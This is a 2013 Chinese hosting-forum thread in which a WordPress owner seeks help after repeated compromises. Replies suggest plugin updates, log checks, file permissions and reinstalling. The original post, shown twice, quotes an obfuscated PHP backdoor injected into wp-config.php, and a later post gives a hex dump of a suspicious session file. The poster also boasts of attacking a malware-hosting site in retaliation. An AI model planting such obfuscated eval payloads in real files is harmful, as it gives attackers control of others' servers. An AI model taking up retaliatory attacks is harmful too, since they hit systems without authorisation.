全球主机交流论坛

标题: WP是不是又有什么重大漏洞没修复？ [打印本页]

---

作者: solar    时间: 2013-3-19 00:19
标题: WP是不是又有什么重大漏洞没修复？


一个小博客每隔1星期被黑一次。VPS都换了3家了，全部最新版本的。。。。



wp-config.php也被注入了：

1. <?php eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSl**8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtM9KWhO+RiPLu07sprjK5qxAsPCb0DMjn1gN9pYbCoOuzhDP1dOLCw0EaLTrK2X8S3M9gM/JG3NbWWW8PjVpZC3uIALEXsbLHv4yfo4Wy60HAtgg+7BHB7/2i/2OWeaID7oNTVWeP6W5bqJi+JE7ld4i9IOZ6g2wBFbY773SCAWjRfwS07+QOAQOeT7mmqNVtmVW6KlU+H/wi5UHfNkAIe2zwgL16QR/rzy4/Jw7RmOu+b9Cjl5g+vi9KZZrXSBrjhj9zcLCZE3cNlmpxPZ0l2cnYGFJsQB5r/Aa4Ls7jh8U/oXQBofFpFi+ieBpvHECyfQnrfNnR4fvnuzevRKNgB7hHyMRA81tt127ubt6VJt6fsdDr99DG5plnWmoprOrcz6pi+XfZT4LAJQphQQOK4e4rR15O8iPsUJ93/jAFkLJS6FdDJJl2oc7nwx+F4BK10jR3axg7ehnTY0WlQayGhWojcCXaMOu4ohYMDVuXIKl63Fr416fNJ1BF9wEmTPpvWG47A3/oH')));?>

复制代码

哪位大大分析下这是什么网站，老子攻击它去
上次查到了一个挂马的网站，直接举报+攻击到它打不开

---

作者: 啪啪啪啪啪    时间: 2013-3-19 00:27
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: 史上第一    时间: 2013-3-19 00:30
请将部分插件也更新到最新版.

---

作者: 一步一杀    时间: 2013-3-19 00:36
找到被黑原因了吗？查查日志呢

---

作者: 信仰    时间: 2013-3-19 00:41
呃 这个几率好小 连续被黑的吗 排查什么问题没有 修复过没有

---

作者: solar    时间: 2013-3-19 00:44

史上第一 发表于 2013-3-19 00:30
请将部分插件也更新到最新版.

都更新了

---

作者: aarwwefdds    时间: 2013-3-19 00:45
确定人家没留后门在你的WP中？

---

作者: solar    时间: 2013-3-19 00:47

一步一杀 发表于 2013-3-19 00:36
找到被黑原因了吗？查查日志呢

只能去挖这个了。。。
根目录被注入生成了：
sess_9f90b1c8d2dc066344f19a1dc2e00628 文件
打开：
^[^S^S^D^X^]^D^[^X^R^D^[^Z^_V

---

作者: solar    时间: 2013-3-19 00:48


wp-config.php也被注入了：

1. <?php eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSl**8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtM9KWhO+RiPLu07sprjK5qxAsPCb0DMjn1gN9pYbCoOuzhDP1dOLCw0EaLTrK2X8S3M9gM/JG3NbWWW8PjVpZC3uIALEXsbLHv4yfo4Wy60HAtgg+7BHB7/2i/2OWeaID7oNTVWeP6W5bqJi+JE7ld4i9IOZ6g2wBFbY773SCAWjRfwS07+QOAQOeT7mmqNVtmVW6KlU+H/wi5UHfNkAIe2zwgL16QR/rzy4/Jw7RmOu+b9Cjl5g+vi9KZZrXSBrjhj9zcLCZE3cNlmpxPZ0l2cnYGFJsQB5r/Aa4Ls7jh8U/oXQBofFpFi+ieBpvHECyfQnrfNnR4fvnuzevRKNgB7hHyMRA81tt127ubt6VJt6fsdDr99DG5plnWmoprOrcz6pi+XfZT4LAJQphQQOK4e4rR15O8iPsUJ93/jAFkLJS6FdDJJl2oc7nwx+F4BK10jR3axg7ehnTY0WlQayGhWojcCXaMOu4ohYMDVuXIKl63Fr416fNJ1BF9wEmTPpvWG47A3/oH')));?>

复制代码

哪位大大分析下这是什么网站，老子攻击它去
上次查到了一个挂马的网站，直接举报+攻击到它打不开

---

作者: 一步一杀    时间: 2013-3-19 00:48
VPS上还有其他站吗

---

作者: solar    时间: 2013-3-19 00:52

一步一杀 发表于 2013-3-19 00:48
VPS上还有其他站吗

就WP + PIWIK

---

作者: k2775739    时间: 2013-3-19 01:46
他那是解密  你直接将它转化为字符串赋值给一个变量  再打印这个变量  就看到他源码了

---

作者: 醉卧网络君莫笑    时间: 2013-3-19 01:46
估计是模板或者插件的问题

---

作者: solar    时间: 2013-3-19 03:14

1. 68 56 56 62 62 39 73 32  46 48 35 32 67 66 34 48
   
2. 4A 68 42 4B 4B 56 46 6C  75 32 76 61 6F 70 37 57
   
3. 42 49 6D 32 46 56 33 69  51 6E 47 32 68 38 41 54
   
4. 46 4A 6D 30 32 55 69 6B  53 6C 46 4C 67 38 62 2F
   
5. 76 65 65 51 73 71 32 67  41 66 59 51 30 54 7A 33
   
6. 79 2F 63 78 76 4A 57 46  45 55 6F 53 72 71 74 73
   
7. 55 52 4C 66 61 33 55 5A  6B 4F 2F 50 6E 77 30 45
   
8. 4A 7A 37 76 31 42 6E 37  4A 68 72 54 2B 4C 51 41
   
9. 64 53 61 6B 4D 44 52 77  56 67 4F 76 57 4A 47 59
   
10. 62 4F 55 75 77 41 51 31  56 74 59 77 6F 32 71 51
    
11. 46 71 75 51 6E 46 36 6C  66 30 30 2F 7A 37 49 30
    
12. 6D 56 32 6C 46 37 50 30  35 4F 4C 79 39 79 51 4E
    
13. 79 64 6A 5A 65 36 6F 31  6D 31 44 73 47 79 73 49
    
14. 65 6A 6B 56 31 75 4C 6B  57 6B 74 6C 35 57 51 76
    
15. 6A 73 6B 6F 49 4A 30 58  7A 38 75 47 37 64 49 57
    
16. 70 57 72 59 4C 73 43 61  4D 46 43 54 37 78 74 6A
    
17. 55 62 4A 73 79 55 78 57  4B 47 6D 59 68 4D 5A 63
    
18. 31 57 73 77 31 63 79 30  57 68 4B 6A 52 65 57 6A
    
19. 4F 66 71 44 2F 50 6B 7A  33 68 39 56 6F 62 45 70
    
20. 49 51 4F 63 67 53 66 4B  75 44 47 36 5A 4E 4B 4B
    
21. 4A 70 36 4B 4B 63 57 30  58 47 6D 6F 51 55 44 47
    
22. 30 59 54 41 2B 53 74 38  53 76 78 31 65 49 69 46
    
23. 52 7A 47 59 58 33 74 69  54 76 34 6C 39 4D 42 36
    
24. 64 4E 6B 39 39 57 54 57  68 6D 6E 47 66 5A 64 54
    
25. 51 31 52 49 61 6C 53 70  37 70 6A 32 76 65 77 79
    
26. 53 66 39 4F 30 75 76 39  50 32 65 7A 7A 7A 42 69
    
27. 6D 47 79 53 37 73 39 74  2B 31 37 44 47 6A 44 50
    
28. 74 63 37 76 66 62 70 55  61 6C 6B 79 47 74 49 62
    
29. 49 5A 64 77 33 4F 63 72  70 65 44 4D 6D 31 76 38
    
30. 71 70 49 47 58 66 45 73  68 2B 58 36 31 6A 74 76
    
31. 43 4A 79 42 57 34 59 50  69 57 73 46 55 39 4D 68
    
32. 53 69 4D 61 30 57 41 76  74 69 73 49 79 48 61 41
    
33. 4C 65 74 31 74 4E 6E 50  7A 30 33 42 48 75 44 77
    
34. 49 62 54 74 61 36 48 6A  58 53 39 6E 30 39 4F 72
    
35. 38 2B 51 43 49 44 4F 64  7A 76 62 6E 74 68 63 4F
    
36. 6E 59 42 56 52 49 64 51  56 35 50 52 71 46 6F 63
    
37. 2B 52 51 6A 63 5A 31 58  7A 42 55 50 4E 65 37 5A
    
38. 4C 58 66 41 39 58 68 41  48 68 36 49 45 52 58 7A
    
39. 41 2F 4C 53 49 71 43 79  4E 39 54 38 52 74 36 4D
    
40. 44 6F 36 77 4F 51 66 70  52 56 6B 67 53 69 77 6C
    
41. 66 4C 6F 79 70 6E 34 2F  48 49 36 50 78 74 47 72
    
42. 31 2B 2B 69 38 61 74 66  6F 76 48 62 30 56 41 57
    
43. 77 36 55 73 6F 6E 70 56  66 2F 69 50 36 66 6A 4C
    
44. 31 35 62 70 2B 36 6A 4D  44 57 74 4D 39 4B 57 68
    
45. 4F 2B 52 69 50 4C 75 30  37 73 70 72 6A 4B 35 71
    
46. 78 41 73 50 43 62 30 44  4D 6A 6E 31 67 4E 39 70
    
47. 59 62 43 6F 4F 75 7A 68  44 50 31 64 4F 4C 43 77
    
48. 30 45 61 4C 54 72 4B 32  58 38 53 33 4D 39 67 4D
    
49. 2F 4A 47 33 4E 62 57 57  57 38 50 6A 56 70 5A 43
    
50. 33 75 49 41 4C 45 58 73  62 4C 48 76 34 79 66 6F
    
51. 34 57 79 36 30 48 41 74  67 67 2B 37 42 48 42 37
    
52. 2F 32 69 2F 32 4F 57 65  61 49 44 37 6F 4E 54 56
    
53. 57 65 50 36 57 35 62 71  4A 69 2B 4A 45 37 6C 64
    
54. 34 69 39 49 4F 5A 36 67  32 77 42 46 62 59 37 37
    
55. 33 53 43 41 57 6A 52 66  77 53 30 37 2B 51 4F 41
    
56. 51 4F 65 54 37 6D 6D 71  4E 56 74 6D 56 57 36 4B
    
57. 6C 55 2B 48 2F 77 69 35  55 48 66 4E 6B 41 49 65
    
58. 32 7A 77 67 4C 31 36 51  52 2F 72 7A 79 34 2F 4A
    
59. 77 37 52 6D 4F 75 2B 62  39 43 6A 6C 35 67 2B 76
    
60. 69 39 4B 5A 5A 72 58 53  42 72 6A 68 6A 39 7A 63
    
61. 4C 43 5A 45 33 63 4E 6C  6D 70 78 50 5A 30 6C 32
    
62. 63 6E 59 47 46 4A 73 51  42 35 72 2F 41 61 34 4C
    
63. 73 37 6A 68 38 55 2F 6F  58 51 42 6F 66 46 70 46
    
64. 69 2B 69 65 42 70 76 48  45 43 79 66 51 6E 72 66
    
65. 4E 6E 52 34 66 76 6E 75  7A 65 76 52 4B 4E 67 42
    
66. 37 68 48 79 4D 52 41 38  31 74 74 31 32 37 75 62
    
67. 74 36 56 4A 74 36 66 73  64 44 72 39 39 44 47 35
    
68. 70 6C 6E 57 6D 6F 70 72  4F 72 63 7A 36 70 69 2B
    
69. 58 66 5A 54 34 4C 41 4A  51 70 68 51 51 4F 4B 34
    
70. 65 34 72 52 31 35 4F 38  69 50 73 55 4A 39 33 2F
    
71. 6A 41 46 6B 4C 4A 53 36  46 64 44 4A 4A 6C 32 6F
    
72. 63 37 6E 77 78 2B 46 34  42 4B 31 30 6A 52 33 61
    
73. 78 67 37 65 68 6E 54 59  30 57 6C 51 61 79 47 68
    
74. 57 6F 6A 63 43 58 61 4D  4F 75 34 6F 68 59 4D 44
    
75. 56 75 58 49 4B 6C 36 33  46 72 34 31 36 66 4E 4A
    
76. 31 42 46 39 77 45 6D 54  50 70 76 57 47 34 37 41
    
77. 33 2F 6F 48

复制代码

这是什么啊 。。。。

---

作者: 用户名    时间: 2013-3-19 06:10
娃儿，你这是被留后门了～只是你不知道

---

作者: xen    时间: 2013-3-19 06:49
WP-CONFIG不给644笑而不语

---

作者: solar    时间: 2013-3-19 14:16

xen 发表于 2013-3-19 06:49
WP-CONFIG不给644笑而不语

早设置成440了。。。。

---

作者: zicca    时间: 2013-3-19 14:20
博客几年了从没被黑，小伙要低调

---

作者: solar    时间: 2013-3-19 14:33

zicca 发表于 2013-3-19 14:20
博客几年了从没被黑，小伙要低调

也就最近一个月的的事，以前也从没被黑，VPS上的安全设置基本无懈可击了，所以怀疑是WP漏洞

---

作者: imtu    时间: 2013-3-19 14:35
杯具

---

作者: 东方星雨    时间: 2013-3-19 14:45
我的WP更是离谱，在后台快捷可以发文章，在完整版那发文章，死活都发不出去，发的文章占用了ID号，可是哪都没显示，我现在打算用新的WP安装文件覆盖现在的文件试试

---

作者: ylsnuha    时间: 2013-3-19 14:51
主题插件是不被修改的或有恶意代码，vps上面是不有别的站一起被黑。

---

作者: 勇少    时间: 2013-3-19 15:00
备份数据库和图片文件夹 重新安装新版本 导入。

---

作者: 葫芦娃    时间: 2013-3-19 15:00
能新注册用户么

---

欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/)

Powered by Discuz! X3.4